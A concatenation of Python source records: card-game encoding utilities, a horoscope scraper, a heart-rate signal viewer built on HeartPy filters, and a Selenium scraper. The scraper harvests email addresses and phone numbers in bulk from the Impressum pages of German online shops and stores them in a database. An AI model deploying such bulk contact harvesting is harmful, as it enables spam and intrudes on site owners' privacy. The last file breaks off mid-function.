Card\n\n# Read required docs\nROOT_PATH = rlcard.__path__[0]\n\n# a map of abstract action to its index and a list of abstract action\nwith open(os.path.join(ROOT_PATH, 'games/karma/jsondata/action_space.json'), 'r') as file:\n ACTION_SPACE = json.load(file, object_pairs_hook=OrderedDict)\n ACTION_LIST = list(ACTION_SPACE.keys())\n\n# a map of color to its index\n# COLOR_MAP = {'d': 0, 'h': 1, 's': 2, 'c': 3} #diamonds,hearts,spades,clubs\n\nCOUNT_MAP = {'1': 0, '2': 1, '3': 2} # one, two or three cards of a trait\n\n# a map of trait to its index\nTRAIT_MAP = {'4': 0, '5': 1, '6': 2, '7': 3, '8': 4, '9': 5, 'J': 6, 'Q': 7,\n 'K': 8, 'A': 9, '2': 10, '3': 11, '10': 12}\n\nWILD = ['2', '3', '10']\n\n\n# WILD_DRAW_4 = ['r-wild_draw_4', 'g-wild_draw_4', 'b-wild_draw_4', 'y-wild_draw_4']\n\n\ndef init_deck():\n ''' Generate karma deck of 52 cards\n '''\n deck = []\n card_info = 
Card.info\n    for i in range(4):\n\n        # init number cards\n        for num in card_info['trait'][:10]:\n            deck.append(Card('number', num))\n\n        # init wild cards\n        for action in card_info['trait'][10:13]:\n            deck.append(Card('wild', action))\n\n    return deck\n\n\ndef cards2list(cards):\n    ''' Get the corresponding string representation of cards\n\n    Args:\n        cards (list): list of KarmaCards objects\n\n    Returns:\n        (string): string representation of cards\n    '''\n    cards_list = []\n    for card in cards:\n        cards_list.append(card.get_str())\n    return cards_list\n\n\ndef get_cards_dict(cards):\n    ''' Get the corresponding dict representation of cards\n\n    Args:\n        cards (list): list of string of cards\n\n    Returns:\n        (dict): dict of cards\n    '''\n\n    cards_dict = {}\n    if cards:\n        for card in cards:\n            if card not in cards_dict:\n                cards_dict[card] = 1\n            else:\n                cards_dict[card] += 1\n    return cards_dict\n\n\ndef encode_cards(plane, hand):\n    ''' Encode hand and preserve it into plane\n\n    Args:\n        plane (array): 4*13 numpy array\n        hand (list): list of string of hand's card\n\n    Returns:\n        (array): 4*13 numpy array\n    '''\n\n    # 1 card,2 cards ,3 cards, 4 cards\n\n    hand_ = get_cards_dict(hand)\n    for card, count in hand_.items():\n        card_info = card\n        trait = TRAIT_MAP[card_info]\n        plane[count - 1][trait] = 1\n    return plane\n\ndef encode_target(plane, target):\n    ''' Encode target and preserve it into plane\n\n    Args:\n        plane (array): 1*13 numpy array (the docstring previously said 1*4*15, but only plane[0] with the 13 traits is used)\n        target(str): string of target card\n\n    Returns:\n        (array): 1*13 numpy array\n    '''\n    if target != '':\n        target_info = target\n        trait = TRAIT_MAP[target_info]\n        plane[0][trait] = 1\n    return plane\n\n\n# def encode_target(plane, target):\n#     ''' Encode target and preserve it into plane\n\n#     Args:\n#         plane (array): 4*13 numpy array\n#         target(str): string of target card\n\n#     Returns:\n#         (array): 4*13 numpy array \n#     '''\n\n#     target = get_cards_dict(target)\n\n#     for card, count in target.items():\n#         card_info = card\n#         # color = COLOR_MAP[card_info[0]]\n#         trait = TRAIT_MAP[card_info]\n#         plane[count - 1][trait] = 1\n#     return plane\n","sub_path":"rlcard/games/karma/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"22358282","text":"import requests as rq\nfrom bs4 import BeautifulSoup\nimport time, json, argparse\n\n# To scrape: constellation name, lucky time, lucky constellation, wealth-fortune index\n# wealth-fortune index + the description under the wealth section\n# (comments translated from Chinese)\n\ndef crawl(link):\n    response = rq.get(link)\n    soup = BeautifulSoup(response.text, \"html.parser\")\n    dic = {}\n    dic_constellation = {\"10\":\"水瓶座\", \"11\":\"雙魚座\", \"0\":\"牡羊座\", \"1\":\"金牛座\", \"2\":\"雙子座\", \"3\":\"巨蟹座\",\"4\":\"獅子座\",\"5\":\"處女座\",\n                         \"6\":\"天秤座\",\"7\":\"天蠍座\",\"8\":\"射手座\",\"9\":\"摩羯座\"}\n    \n    # constellation\n    temp_index = link.find(\"Astro\")\n    dic[\"constellation\"] = dic_constellation[link[temp_index+6]]\n    \n    # lucky time\n    dic[\"luc_time\"]=soup.find_all(\"h4\")[3].getText()\n    \n    # lucky constellation\n    dic[\"luc_constellation\"]=soup.find_all(\"h4\")[4].getText()\n    \n    # wealth-fortune index\n    temp_index = str(soup.find_all(\"div\", class_=\"STAR_LIGHT\")[3]).find(\"icon\") # look for the string 'icon'\n    fortune_index = str(soup.find_all(\"div\", class_=\"STAR_LIGHT\")[3])[temp_index+5]\n    dic[\"fortune_index\"] = fortune_index\n    # description of the wealth section\n    fortune_descri = soup.find_all(\"span\", class_=\"txt_orange\")[0].parent.find_next_siblings(\"p\")[0].getText()\n    dic[\"fortune_descri\"] = fortune_descri\n    \n    return dic\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-web', type=str, help='website address')\nargs = parser.parse_args()\n\nif __name__ 
== '__main__':\n output = crawl(args.web)\n #把title與document寫入\n print(output)\n jsObj = json.dumps(output, ensure_ascii=False)\n with open('./output.json', 'w') as f:\n f.write(jsObj)\n\n","sub_path":"crawl_constellation.py","file_name":"crawl_constellation.py","file_ext":"py","file_size_in_byte":1606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"525140323","text":"# Webscraper searches through a Website by given url for specific data\n# For now its scrapping emails and phone-numbers\n# Configured for german sites\nfrom selenium import webdriver\nfrom bs4 import BeautifulSoup\nfrom urllib.request import urlopen\n#self made mathod to handle functions taking too long\nfrom timeout import timeout\nfrom dbHandler import DbHandler\nimport re\n\nclass Webscraper:\n def __init__(self, url):\n # self.url = url\n # self.emails = [] # list\n # self.numbers = [] # list\n self.browser = webdriver.PhantomJS()\n self.browser.set_window_size(1024, 768)\n # self.browser.get(self.url)\n # self.content = ''\n self.initNewContent(url)\n\n ### GET METHODS HERE\n def getUrl(self):\n return self.url\n\n def getEmails(self):\n return self.emails\n\n def getNumbers(self):\n return self.numbers\n\n ### FORMAT & REMOVE NEEDLESS CONTENT ###\n def initNewContent(self, newUrl, leaveLists=0):\n if leaveLists == 0:\n self.numbers = []\n self.emails = []\n self.url = newUrl\n self.browser.get(self.url)\n soup = BeautifulSoup(self.browser.page_source)\n for script in soup([\"script\", \"style\"]):\n script.extract() # rip out script content\n self.content = soup.get_text()\n\n\n ### RUN ###\n def run(self):\n self.findNumbers()\n self.findEmails()\n self.findImpressum()\n self.findNumbers()\n self.findEmails()\n # self.printResult()\n\n ### PRINT RESULTS (EMAILS & NUMBERS) ###\n def printResult(self):\n if self.numbers:\n print(\", \".join(self.numbers))\n if self.emails:\n print(\", \".join(self.emails))\n\n ### FINDS EMAIL-ADRESSES ON A PAGE BY URL - ADDS TO A LIST ###\n def findEmails(self):\n EMAIL_REGEX = re.compile(\"([a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\\.[a-zA-Z0-9-.]+)\")\n match = re.findall(EMAIL_REGEX, self.content)\n for m in match:\n m = ''.join(m)\n m = re.sub(\"(\\(@\\)|\\<@\\>|\\(at\\))\", \"@\", m)\n m = m.lower()\n m = re.sub(\"\\.de.+\", \".de\", m)\n m = re.sub(\"\\.ch.+\", \".ch\", m)\n m = re.sub(\"\\.eu.+\", \".eu\", m)\n m = re.sub(\"\\.at.+\", \".at\", m)\n m = re.sub(\"\\.com.+\", \".com\", m)\n m = re.sub(\"\\.org.+\", \".org\", m)\n if not m[-1].isalpha():\n m = m[:-1]\n if (m not in self.emails) and (m != ''):\n self.emails.append(m)\n\n ### FINDS PHONE NUMBERS ON A PAGE BY URL - ADDS TO A LIST ###\n def findNumbers(self):\n NUMBER_REGEX = \"(Tel|tel|TEL|Tele|tele|TELE|Telefon|telefon|TELEFON|Fon|FON|fon|line|Line|LINE|Phone|Call)\"\n NUMBER_REGEX += \"([:\\.\\-\\s]*)(\\<\\/[^\\>]+\\>)*\\s*(\\<[^\\>]+\\>)?\\s*([+\\(]?)([\\d\\s\\- –)(\\/]{7,})\"\n match = re.findall(NUMBER_REGEX, self.content)\n # print(NUMBER_REGEX)\n for m in match:\n m = ''.join(m)\n m = re.findall('\\d+', m)\n m = ''.join(m)\n if (m not in self.numbers) and (m != '') and (len(str(m)) > 6):\n self.numbers.append(m)\n\n ### DOES FIND THE IMPRESSUM/KONTAKT PAGE AND INITS THE CONTENT FROM THAT PAGE ###\n def findImpressum(self):\n possibleLinks = [\"Impressum\", \"IMPRESSUM\", \"impressum\",\n \"Kontakt\", \"kontakt\", \"KONTAKT\", \"Kontakt/Impressum\"]\n impTag = None\n for pl in possibleLinks:\n try:\n impTag = self.browser.find_element_by_partial_link_text(pl)\n break\n 
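# (comment added for clarity) find_element_by_partial_link_text raises selenium's NoSuchElementException when no matching link exists; the bare except below simply tries the next candidate label\n            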
except:\n pass\n if impTag is not None:\n self.initNewContent(impTag.get_attribute(\"href\"), 1)\n\n\n\n\ndef main():\n\n ### 1st Modi - SCRAPPING SINGLE URL - NO DB - PRINT ONLY ###\n\n # myScrapper = Webscraper(\"http://www.gehoerschutz-versand.de\")\n # print(myScrapper.getUrl())\n # myScrapper.run()\n # myScrapper.printResult()\n # print(myScrapper.getUrl())\n\n\n\n\n ### 2nd Modi - WITHOUT TIMEOUT TRY-BLOCK - FOR BETTER DEBUGGING ###\n\n # filename = \"lists/listWithTitles.txt\"\n # list = open(filename, 'r')\n #\n # myDbHandler = DbHandler(\"db/online-shops.db\")\n # myDbHandler.create_all_tables()\n # i = 1\n # myScrapper = Webscraper(\"http://www.example.com\")\n # for line in list:\n # if line.startswith('--'):\n # category = line.replace(\"--\", \"\")\n # print(\"\\n\\n\" + category + \"\\n\\n\")\n # elif line.startswith('h'):\n # myScrapper.initNewContent(line)\n # link = myScrapper.getUrl()\n #\n # myScrapper.run()\n # impLink = myScrapper.getUrl()\n # myDbHandler.insertToLinkTable(i, category, link, impLink)\n # myDbHandler.InsertListToNumbersTable(i, myScrapper.getNumbers())\n # myDbHandler.InsertListToEmailsTable(i, myScrapper.getEmails())\n # numbers = \";\".join(myScrapper.getNumbers())\n # emails = \";\".join(myScrapper.getEmails())\n # print(link + \";\" + impLink + \";\" + numbers + \";\" + emails + \"\\n\")\n # i += 1\n # else:\n # pass\n\n\n\n ### 3rd Modi - FINAL - WRITE IN DB - MAKING SURE FOR NO ENDLES METHODS ###\n\n filename = \"lists/listPart4.txt\"\n list = open(filename, 'r')\n\n myDbHandler = DbHandler(\"db/online-shops.db\")\n myDbHandler.create_all_tables()\n i = 6705\n myScrapper = Webscraper(\"http://www.example.com\")\n category = \"produkt-und-preisvergleiche--\"\n for line in list:\n if line.startswith('--'):\n category = line.replace(\"--\", \"\")\n print(\"\\n\\n\" + category + \"\\n\\n\")\n elif line.startswith('h'):\n with timeout(seconds=80):\n try:\n myScrapper.initNewContent(line)\n link = myScrapper.getUrl()\n\n myScrapper.run()\n impLink = myScrapper.getUrl()\n myDbHandler.insertToLinkTable(i, category, link, impLink)\n myDbHandler.InsertListToNumbersTable(i, myScrapper.getNumbers())\n myDbHandler.InsertListToEmailsTable(i, myScrapper.getEmails())\n numbers = \";\".join(myScrapper.getNumbers())\n emails = \";\".join(myScrapper.getEmails())\n finalString = link + \";\" + impLink + \";\" + numbers + \";\" + emails\n finalString = finalString.replace(\"\\n\", \"\")\n # finalString += \"\\n\"\n print(finalString)\n i += 1\n except:\n myScrapper = Webscraper(\"http://www.example.com\")\n pass\n # print(\"ERROR -> \" + line)\n else:\n pass\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"web-scrapper.py","file_name":"web-scrapper.py","file_ext":"py","file_size_in_byte":6777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"372162088","text":"## MARS Group Reverse-Engineering\n## MS: Biotechnology- Bioinformatics Capstone Spring 2021\n## University of Maryland Global Campus\n## Authors: Alex Mancera, Stephen Panossian, Analia Treviño-Flitton\n## HRVY- Heart Rate Viewer in PYthon Version 1.0\n\nimport numpy as np\nfrom heartpy import smooth_signal\nfrom scipy.signal import butter, filtfilt, iirnotch, savgol_filter\n\n# --------------------- HeartPy Source Code Start --------------------------------------------------\n__all__ = ['filter_signal',\n 'smooth_signal',\n 'get_samplerate_datetime']\n\n\ndef butter_lowpass(cutoff, sample_rate, order=2):\n nyq = 0.5 * sample_rate\n normal_cutoff = 
cutoff / nyq\n b, a = butter(order, normal_cutoff, btype='low', analog=False)\n return b, a\n\n\ndef butter_highpass(cutoff, sample_rate, order=2):\n nyq = 0.5 * sample_rate\n normal_cutoff = cutoff / nyq\n b, a = butter(order, normal_cutoff, btype='high', analog=False)\n return b, a\n\n\ndef butter_bandpass(lowcut, highcut, sample_rate, order=2):\n nyq = 0.5 * sample_rate\n low = lowcut / nyq\n high = highcut / nyq\n b, a = butter(order, [low, high], btype='band')\n return b, a\n\n\ndef filter_signal(data, cutoff, sample_rate, order=2, filtertype='highpass',\n return_top=False): # changed 'lowpass' to 'highpass' for more accuracy\n if filtertype.lower() == 'lowpass':\n b, a = butter_lowpass(cutoff, sample_rate, order=order)\n elif filtertype.lower() == 'highpass':\n b, a = butter_highpass(cutoff, sample_rate, order=order)\n elif filtertype.lower() == 'bandpass':\n assert type(cutoff) == tuple or list or np.array, 'if bandpass filter is specified, \\\ncutoff needs to be array or tuple specifying lower and upper bound: [lower, upper].'\n b, a = butter_bandpass(cutoff[0], cutoff[1], sample_rate, order=order)\n elif filtertype.lower() == 'notch':\n b, a = iirnotch(cutoff, Q=0.005, fs=sample_rate)\n else:\n raise ValueError('filtertype: %s is unknown, available are: \\\nlowpass, highpass, bandpass, and notch' % filtertype)\n\n filtered_data = filtfilt(b, a, data)\n\n if return_top:\n return np.clip(filtered_data, a_min=0, a_max=None)\n else:\n return filtered_data\n\n\ndef remove_baseline_wander(data, sample_rate, cutoff=0.05):\n return filter_signal(data=data, cutoff=cutoff, sample_rate=sample_rate, filtertype='notch')\n\n\ndef smooth_signal(data, sample_rate, window_length=None, polyorder=3):\n if window_length == None:\n window_length = sample_rate // 10\n\n if window_length % 2 == 0 or window_length == 0: window_length += 1\n\n smoothed = savgol_filter(data, window_length=window_length,\n polyorder=polyorder)\n return smoothed\n\n\ndef get_samplerate_datetime(datetimedata, timeformat='%H:%M:%S.%f'):\n from datetime import datetime\n datetimedata = np.asarray(datetimedata, dtype='str') # cast as str in case of np.bytes type\n elapsed = ((datetime.strptime(datetimedata[-1], timeformat) -\n datetime.strptime(datetimedata[0], timeformat)).total_seconds())\n sample_rate = (len(datetimedata) / elapsed)\n return sample_rate\n\n\ndef scale_data(data, lower=0, upper=1024):\n rng = np.max(data) - np.min(data)\n minimum = np.min(data)\n data = (upper - lower) * ((data - minimum) / rng) + lower\n return data\n\n\ndef enhance_peaks(hrdata, iterations=2):\n scale_data(hrdata)\n for i in range(iterations):\n hrdata = np.power(hrdata, 2)\n hrdata = scale_data(hrdata)\n return hrdata\n\n\ndef flip_signal(data, enhancepeaks=False, keep_range=True):\n data_mean = np.mean(data)\n data_min = np.min(data)\n data_max = np.max(data)\n\n # invert signal\n data = (data_mean - data) + data_mean\n\n if keep_range:\n # scale data so original range is maintained\n data = scale_data(data, lower=data_min, upper=data_max)\n if enhancepeaks:\n data = enhance_peaks(data)\n return data\n\n\n# --------------------- HeartPy Source Code End ---------------------------------------------------\n\n\n''' HRVY- Heart Rate Viewer in PYthon Version 1.0 '''\n\n\n## Opens files & returns them as lists\ndef file_opener(dataset):\n import os\n contents = 'end'\n cur_dir = os.listdir(os.getcwd())\n hdr_found = False\n\n ## Check files in cwd for approved file types\n for file in cur_dir:\n ## Look for csv first\n if 
file.startswith(dataset) and file.endswith('.csv'):\n ## Checks for matching hdr file\n for second_file in cur_dir:\n if second_file.startswith(dataset) and second_file.endswith('.hdr'):\n try:\n with open(dataset + '.hdr', 'r') as h:\n hdr = h.readlines()\n with open(dataset + '.csv', 'r') as v:\n csv = v.readlines()\n print('Both csv and hdr files found')\n contents = (hdr, csv)\n hdr_found = True\n break\n except FileNotFoundError:\n print('Not a matching csv and hdr file')\n\n ## If hdr wasn't found, check csv for hdr data\n if hdr_found != True:\n try:\n contents = cat_file_parser(dataset + '.csv')\n break\n except FileNotFoundError:\n print('Not a csv file nested with hdr data')\n break\n\n ## If not one of the above, check for cat file\n elif file.startswith(dataset) and file.endswith('.cat'):\n try:\n print(\"The cat file has been found in the directory\")\n contents = cat_file_parser(dataset + '.cat')\n except FileNotFoundError:\n print('Not a cat file')\n break\n\n ## If no file found\n if contents == 'end':\n print(\n 'Cannot locate a viable file, please make sure data set name, the file type, and the directory are correct')\n\n return contents\n\n\n \n## Splits concatenated files & returns them as lists to main\ndef cat_file_parser(cat_file):\n del_num = 0\n hdr = []\n\n with open(cat_file, 'r') as f:\n intro = f.readlines()\n\n ## Split the hdr contents into own list\n for i in range(len(intro)):\n if intro[i].startswith('{id:'):\n hdr.append(intro[i])\n del_num += 1\n\n\n ## If no hdr file contents found\n elif not intro[i].startswith('{id:') and del_num == 0:\n print('This is not a concatenated file, no hdr data found')\n contents = \"end\"\n return contents\n\n ## If it is a cat file, hdr contents will be deleted from csv list\n if del_num != 0:\n print('Concatenated data found')\n for j in range(0, del_num):\n del intro[0]\n\n ## Pack lists into tuples & return\n contents_tup = (hdr, intro)\n\n return contents_tup\n\n\n \n## Parses hdr data and saves in a nested dictionary\ndef hdr_data(hdr):\n hdr_dat = {}\n node = 1\n nodes_not_2ms = {}\n\n ## Node information is formatted\n for line in hdr:\n l_split = line.strip('{').strip('\\n').strip('}').split(', ')\n\n ## Creates new nested dictionary with each line read in .hdr file\n hdr_dat[node] = {}\n for item in l_split:\n hdr_dat[node][item.split()[0].strip(':')] = item.split()[1]\n if item.split()[0].strip(':') == 'period' and item.split()[1] != '2ms':\n nodes_not_2ms[int(item.split()[1].strip('ms'))] = node\n node += 1\n\n ## Packed into tuple and returned\n hdr_info = (hdr_dat, nodes_not_2ms)\n\n return hdr_info\n\n\n \n## Determines if csv is pre-aligned\ndef align_plus_dat(hdr_dat, csv):\n aligned = ''\n\n ## Number of lines in .hdr file\n num_nodes = len(hdr_dat)\n\n ## Number of columns at the beginning of .csv file\n num_cols_start = len((csv[0]).split(','))\n\n ## Missing number of columns at the beginning of .csv file\n num_cols_mis = num_nodes + 1 - num_cols_start\n\n ## If no columns are missing\n if num_cols_mis == 0:\n print('No missing columns found, csv file pre-aligned')\n aligned = 'yes'\n else:\n print('Missing columns found, csv file not pre-aligned')\n aligned = 'no'\n\n ## Create new dictionary with the time for keys\n file_dat = {}\n file_dat['Time'] = []\n for key in hdr_dat:\n if hdr_dat[key]['label'] in file_dat:\n file_dat[hdr_dat[key]['label'] + '(2)'] = []\n else:\n file_dat[hdr_dat[key]['label']] = []\n hdr_dat.clear()\n\n ## Pack into tuples & return\n align_contents = (num_nodes, 
num_cols_start, num_cols_mis, aligned)\n dat_plus_align = (align_contents, file_dat)\n\n return dat_plus_align\n\n \n\n## Checks for time gaps & fills is missing\ndef time_out(csv, file_dat, nodes_not_2ms, align_cont):\n import datetime as dt\n\n ## Unpack tuple from align_plus_dat\n (num_nodes, num_cols_start, num_cols_mis, aligned) = align_cont\n\n ## Set time object\n last_line_time = ''\n two_ms = dt.timedelta(milliseconds=2)\n\n for line in csv:\n ## If there is a timestamp, current time is kept as provided\n if not line.startswith(','):\n curr_line_time = dt.datetime.strptime(line.split(', ')[0], '%Y-%m-%d %H:%M:%S.%f %z')\n\n ## Checks for time gap\n if last_line_time != '' and curr_line_time != last_line_time + two_ms:\n time_dif = (curr_line_time - last_line_time).total_seconds()\n if time_dif < 180:\n print(' >', time_dif, 'second gap starting at', last_line_time)\n\n ## If time gap is over a minute long\n else:\n print(' >', round(time_dif / 60, 3), 'minute gap starting at', last_line_time)\n while curr_line_time != file_dat['Time'][-1] + two_ms:\n file_dat['Time'].append(file_dat['Time'][-1] + two_ms)\n for key, items in file_dat.items():\n if key != 'Time':\n items.append(0.5)\n if curr_line_time - two_ms <= file_dat['Time'][-1]:\n break\n print(' Gap filled')\n ## Saves current time for reference on next line\n last_line_time = curr_line_time\n\n ## If timestamp not already given adds 2ms to saved reference time\n else:\n last_line_time += two_ms\n file_dat['Time'].append(last_line_time)\n\n ## Records values from csv and fills in blank columns/values with recorded values\n ## Fills in blanks with recorded values or 0.5 (baseline) where data was not recorded\n for n in range(1, num_cols_start):\n file_dat[list(file_dat)[n]].append(float(line.split(', ')[n].strip() or 0.5))\n\n ## If empty columns exist blanks are filled with 0.5 where columns are empty\n if aligned == 'no':\n for n in range(num_cols_mis):\n if len(line.split(', ')) < num_nodes + 1:\n file_dat[list(file_dat)[num_cols_start + n]].append(\n 0.5)\n ## Fills in blanks with recorded values or 0.5 where data was not recorded\n else:\n file_dat[list(file_dat)[num_cols_start + n]].append(float((line.split(', ')[\n num_cols_start + n].strip() or 0.5)))\n ## If there are any non-2ms nodes, derive values for 2ms interval\n if len(nodes_not_2ms) > 0:\n for interval, node in nodes_not_2ms.items():\n node_list = file_dat[list(file_dat)[node]]\n min_start = (interval // 2) + 1\n empty_vals = node_list[-(interval // 2):-1]\n if len(node_list) > min_start and set(empty_vals) == {0.5} and node_list[-1] != 0.5:\n mis_val_int = (node_list[-min_start] - node_list[-1]) / (len(empty_vals) + 1)\n mult = 1\n for n in range(len(empty_vals)):\n node_list[-2 - n] = node_list[-1] + (mult * mis_val_int)\n mult += 1\n\n print('Done pulling data')\n return file_dat\n\n\n \n## Data processing, printing, and plotting options\ndef plot_out(final_dat, dataset):\n import plotly\n import plotly.express as px\n\n ## Create data set folder in cwd\n new_folder()\n\n ## Present user with options\n print('\\nWhich set of data would you like to use?')\n print(' 1) Original, unaltered data')\n print(' 2) Data with baseline correction, noise reduction,')\n print(' and flat/steep peak reduction')\n\n ## If baseline corrections etc selected, corrected_dict is called\n while True:\n op1 = int(input('Choice: '))\n if op1 in (1, 2):\n break\n print('Invalid selection')\n print()\n if op1 == 1:\n data_pref = final_dat\n title = 'Unaltered'\n if op1 == 2:\n 
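# (comment added for clarity) option 2 runs the full cleanup chain defined further below: flat/tall peak reduction, baseline-wander removal, then Savitzky-Golay smoothing via smooth_signal()\n        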
corrected = corrected_dict(final_dat)\n data_pref = corrected\n final_dat.clear()\n title = 'Corrected'\n\n print('\\nWould you like to print ' + title.lower() + ' data?')\n while True:\n op2 = input('Y/N: ').upper()\n if op2 in ('Y', 'N'):\n break\n print('Invalid selection')\n\n ## If saving locally for printing, print_dict is called\n if op2 == 'Y':\n with open(dataset + '_concat_' + title.lower() + '.csv', 'w') as out:\n print_dict(data_pref, out)\n print('\\nData has been printed to the data set folder')\n\n ## Plotting data begins\n print('\\nPlotting points')\n for key, items in data_pref.items():\n if key != 'Time':\n fig = px.line(x=data_pref['Time'][0::4],\n y=data_pref[key][0::4],\n labels={'x': '', 'y': key})\n items = tuple()\n fig.update_layout(title_text=title + ' data from ' + dataset + ', node ' + key, showlegend=False)\n\n ## Offline plot file named here\n plotly.offline.plot(fig, filename=dataset + '_' + key + '_' + title.lower() + '.html')\n print('node', key, 'chart printed')\n\n data_pref.clear()\n\n \n\n## Creates data set folder in the current directory\ndef new_folder():\n import os\n\n ## Get path for cwd\n path = os.path.join(os.getcwd(), dataset)\n\n ## Make new folder named after data set\n try:\n os.makedirs(path, exist_ok=True)\n print('Data set folder created successfully')\n os.chdir(path)\n except OSError:\n print('Data set folder cannot be created')\n\n \n\n## Data corrections occur here\ndef corrected_dict(dictionary):\n corrected = {}\n\n ## Calls HeartPy functions to remove baseline & HRVY peak reductions & inversion\n for key, items in dictionary.items():\n if key == 'Time':\n corrected['Time'] = tuple(dictionary['Time'])\n else:\n sample_rate = round(get_samplerate_datetime(dictionary['Time'], timeformat='%Y-%m-%d %H:%M:%S.%f%z'), 3)\n corrected[key] = tuple(smooth_signal(\n tall_peak_reduct(\n remove_baseline_wander(\n flat_peak_reduct(\n dictionary[key]\n ) # for flat_peak_reduct\n , sample_rate) # for remove_baseline_wander\n ) # for tall_peak_reduct\n , sample_rate, window_length=16, polyorder=3) # for smooth_signal\n )\n print('node', key, 'corrected')\n return corrected\n\n\n \n## Reduces long flat peaks\ndef flat_peak_reduct(lst):\n rep_val = None\n\n steep_slope = 0.5\n not_flat = 0.05\n i_start = None\n v_start = None\n i_end = None\n v_end = None\n ss_check1 = 'N'\n ss_check2 = 'N'\n scale_max = 3\n ss_1 = 0\n\n for i, v in enumerate(lst):\n\n ## If segement of repeated values over 20ms is found, reduce to baseline 0.5\n if i > 0 and rep_val is None and v != 0.5 and v == lst[i - 1]:\n rep_val = v\n rv_start = i - 1\n if rep_val is not None and v != rep_val:\n rv_end = i\n len_rep_val = rv_end - rv_start\n if len_rep_val >= 10 and ss_check1 == 'N':\n lst[rv_start:rv_end] = [0.5] * len_rep_val\n rep_val = None\n\n ## If unrealistic tall peaks or steep slopes found, reduce\n if i > 0:\n slope = v - lst[i - 1]\n if i_start == None and abs(slope) >= not_flat:\n i_start = i - 1\n v_start = lst[i - 1]\n if abs(slope) >= steep_slope:\n ss_check1 = 'Y'\n ss_1 = slope\n if i_start == None:\n i_start = i - 1\n v_start = lst[i - 1]\n if slope != 0 and ss_1 != 0 and ss_check1 == 'Y' and abs(slope) >= not_flat and int(\n slope / abs(slope)) == int(ss_1 / abs(ss_1) * (-1)):\n ss_check2 = 'Y'\n\n ## If not a steep slope, reset values for next iteration\n if i_start != None and ss_check1 == 'N' and i - i_start >= 50:\n i_start = None\n v_start = None\n i_end = None\n v_end = None\n ss_check1 = 'N'\n ss_check2 = 'N'\n\n ## If it is a steep slope, reduce 
segment\n if i_start != None and ss_check2 == 'Y' and slope != 0 and abs(slope) <= not_flat and rep_val == None:\n if i_start == 0:\n v_start = v\n i_end = i\n v_end = v\n len_ss = i_end - i_start\n fill = []\n v_dif = v_end - v_start\n step = v_dif / len_ss\n val = v_start\n vals = lst[i_start:i_end]\n most_dif_val = max(map(lambda x: abs(x - v_start), vals))\n if most_dif_val >= scale_max:\n for gap in range(len_ss):\n fill.append(val)\n val += step\n lst[i_start:i_end] = fill\n\n ## Clears values for next iteration\n i_start = None\n v_start = None\n i_end = None\n v_end = None\n ss_check1 = 'N'\n ss_check2 = 'N'\n ss_1 = 0\n\n return lst\n\n\n \n## Removes unrealistic point and checks for data inversion\ndef tall_peak_reduct(lst):\n steep_slope = 0.3\n not_flat = 0.01\n i_start = None\n v_start = None\n i_end = None\n v_end = None\n ss_check1 = 'N'\n ss_check2 = 'N'\n scale_max = 2\n ss_1 = 0\n\n ## Placeholder for the starting index of sample selection\n samp_start = None\n ## Placeholder for the ending index of sample selection\n samp_end = None\n ## List of guesses for each selection, whether selection is thought to be inverted, normal, or unknown\n inv_guesses = []\n\n for i, v in enumerate(lst):\n ## Start of the segment index & value taken,if unrealistic tall peaks created in flat_peak_reduct, reduce\n if i > 0:\n slope = v - lst[i - 1]\n if i_start == None and abs(slope) >= not_flat:\n i_start = i - 1\n v_start = lst[i - 1]\n if abs(slope) >= steep_slope:\n ss_check1 = 'Y'\n ss_1 = slope\n if i_start == None:\n i_start = i - 1\n v_start = lst[i - 1]\n if slope != 0 and ss_1 != 0 and ss_check1 == 'Y' and abs(slope) >= not_flat and int(\n slope / abs(slope)) == int(ss_1 / abs(ss_1) * (-1)):\n ss_check2 = 'Y'\n\n ## If not a steep slope, reset values for next iteration\n if i_start != None and ss_check1 == 'N' and i - i_start >= 50:\n i_start = None\n v_start = None\n i_end = None\n v_end = None\n ss_check1 = 'N'\n ss_check2 = 'N'\n\n ## If it is a steep slope, reduce segment\n if i_start != None and ss_check2 == 'Y' and abs(slope) <= not_flat:\n i_end = i\n v_end = v\n len_ss = i_end - i_start\n vals = lst[i_start:i_end]\n fill = []\n v_dif = v_end - v_start\n step = v_dif / len_ss\n val = v_start\n most_dif_val = max(map(lambda x: abs(x - v_start), vals))\n if most_dif_val >= scale_max:\n for gap in range(len_ss):\n fill.append(val)\n val += step\n lst[i_start:i_end] = fill\n\n i_start = None\n v_start = None\n i_end = None\n v_end = None\n ss_check1 = 'N'\n ss_check2 = 'N'\n ss_1 = 0\n\n ##Detection of inverted signal by taking samples (1000 datapoints) of normal sections of data\n ## After slope is not flat, index & value taken for start of the sample selection\n if samp_start == None and slope <= not_flat:\n samp_start = i - 1\n ss_v = v\n\n ## If sample selection has started and either a steep slope or tall peak is detected, restart selection\n if samp_start != None and (slope >= steep_slope or abs(\n v - ss_v) > scale_max):\n samp_start = None\n\n ## Once clean selection of 1000 data points is found, take last index of sample selection\n ## Create a list of values from start to end of sample\n if samp_start != None and i - samp_start == 1000:\n samp_end = i\n samp_vals = lst[samp_start:samp_end]\n\n ## Max, min, & midpoint values of sample\n max_sv = max(samp_vals)\n min_sv = min(samp_vals)\n mid_sv = (max_sv + min_sv) / 2\n\n ## Find the percentage of values within the sample that fit the top & bottom half of the range\n top = sum(1 for x in samp_vals if mid_sv <= x <= 
